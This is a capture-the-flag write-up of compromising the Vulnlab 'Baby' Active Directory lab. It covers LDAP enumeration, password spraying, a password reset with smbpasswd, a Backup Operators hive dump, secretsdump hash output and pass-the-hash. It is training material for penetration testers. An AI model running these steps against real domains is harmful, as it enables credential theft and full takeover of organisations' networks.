🐈Baby

Easy machine

Enumeration

Nmap

Ldapsearch

Domain = baby.vl

ldapsearch -H ldap://$IP -x -b "DC=BABY,DC=VL"

I have now a lot of results that can be useful to analyse

About users (& a password inside the description of an user ⚠️):

dev (group)
Jacqueline.Barnett
Ashley.Webb
Hugh.George
Leonard.Dyer
Ian.Walker
it (group)
Connor.Wilkinson
Joseph.Hughes
Kerry.Wilson
Teresa.Bell (password: **********)
Caroline.Robinson

SMB

Access denied in guest

We will try with our new creds: Teresa.Bell:**********

RPC

Try to enum domain users but I’m getting an access denied

Trying also with my new creds but not successful

Kerbrute

After trying a password spraying through all the users, I found the real creds:

Compromised user = Caroline.Robinson@baby.vl:**********

Crackmapexec

We need to change the password to connect to this user

We can use smbpasswd

smbpasswd.py -newpass 'Makito123!' 'baby.vl'/'Caroline.Robinson':'**********'@"$IP"

We have now: Caroline.Robinson':'Makito123!'

Domain Enumeration

Doing some domain enumeration with Bloodhound & PowerShell

We can confirm that the user Caroline.Robinson can backup files and so, we can gat the SAM & SYSTEM files to possibly crack or pass the Admin hash

Backup Operator Privilege Escalation < BorderGateBorderGate

https://www.thehacker.recipes/ad/movement/credentials/dumping/sam-and-lsa-secretwww.thehacker.recipes

Hashes

> secretsdump -sam SAM.save -system SYSTEM.save LOCAL

Impacket for Exegol - v0.10.1.dev1+20240403.124027.3e5f85b - Copyright 2022 Fortra - forked by ThePorgs

[*] Target system bootKey: 0x191d5d3fd5b0b51888453de8541d7e88
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b5??????????????????????:8d992faed3??????????????????????:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...

But we can do nothing with the Admin hash because it’s a local admin so we can’t use this account to connect to the DC

We need also this ntds.dit

Dumping Domain Controller Hashes Locally and Remotely | Red Team Noteswww.ired.team

After following the blog, I can login with the hash with Evil-WinRM and get the root flag

PWNED 🏆

FzF_StormZ just pwned Baby @ Vulnlab!api.vulnlab.com

PreviousMachines NextData

Last updated 1 year ago

hashtagEnumeration

hashtagNmap

hashtagLdapsearch

hashtagSMB

hashtagRPC

hashtagKerbrute

hashtagCrackmapexec

hashtagDomain Enumeration

hashtagHashes

hashtagPWNED 🏆